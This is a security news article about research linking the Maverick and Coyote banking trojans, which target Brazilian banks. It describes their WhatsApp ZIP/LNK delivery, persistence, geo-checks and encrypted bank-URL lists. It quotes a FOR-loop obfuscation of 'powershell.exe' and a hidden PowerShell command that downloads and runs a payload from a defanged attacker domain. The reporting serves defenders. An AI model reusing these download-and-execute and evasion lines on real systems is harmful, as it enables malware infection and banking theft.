Security researchers from CyberProof have discovered significant connections between two advanced banking trojans targeting Brazilian users and financial institutions.
The Maverick banking malware, identified through suspicious file downloads via WhatsApp, shares remarkable similarities with the earlier reported Coyote malware campaign.
Both threats employ sophisticated infection chains and demonstrate nearly identical behavioral patterns.
The discovery emerged when CyberProof security analysts identified incidents involving malicious file downloads through WhatsApp.
Investigation revealed these threats utilize .NET frameworks and deploy multi-stage infection beginning with link files spawning PowerShell commands.
Both malware families target Brazilian banks, employ similar encryption to decrypt banking URLs, and demonstrate nearly identical monitoring routines.
The attack begins when victims receive ZIP files through WhatsApp containing malicious LNK shortcut files. Upon execution, these deploy heavily obfuscated PowerShell commands designed to evade detection.
CyberProof security researchers noted that malware constructs commands through complex FOR loops, splitting executable names and parameters into fragments to bypass monitoring.
.webp "Researchers Uncover the Strong Links Between Maverick and Coyote Banking Malwares 3")
The infection demonstrates sophisticated evasion techniques. The malware employs Base64 and UTF-16LE encoding combined with string concatenation to reconstruct malicious PowerShell commands. One analyzed sample showed the following obfuscation pattern:-
for %y in (pow) do for %c in (er) do for %V in (shel)
do for %q in (1.e) do for %A in (xe) do
%y%c%V%q%A → powershell.exe.webp "Researchers Uncover the Strong Links Between Maverick and Coyote Banking Malwares 4")
Once decoded, the PowerShell command contacts attacker-controlled infrastructure to download additional payloads.
The decoded command establishes connections to malicious domains for further infection.
powershell.exe -w hid -enc IEX (New-Object Net.WebClient).
DownloadString('hxxps://zapgrande[.]com/api/itbi/BrDLwQ4tU70z').webp "Researchers Uncover the Strong Links Between Maverick and Coyote Banking Malwares 5")
Persistence and Detection Evasion
The malware establishes persistence by dropping batch files in the Windows startup folder using a naming pattern of HealthApp- followed by GUID and .bat extension.
This creates outbound connections to command servers at domains like sorvetenopote[.]com and zapgrande[.]com.
The Maverick agent performs extensive victim profiling before executing banking theft functionality.
It checks Brazilian timezone settings, locale configurations, regional settings, and date formats. The malware terminates itself if criteria are not met, ensuring operation within intended geography.
Both Maverick and Coyote employ AES encryption with GZIP compression in CBC mode to decrypt stored banking URLs from Base64 strings.
This encryption similarity, combined with nearly identical banking monitoring code, strongly suggests shared development origins. The malware monitors browsers including Chrome, Firefox, Edge, Opera, and Brave for connections to over 50 Brazilian financial institutions.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
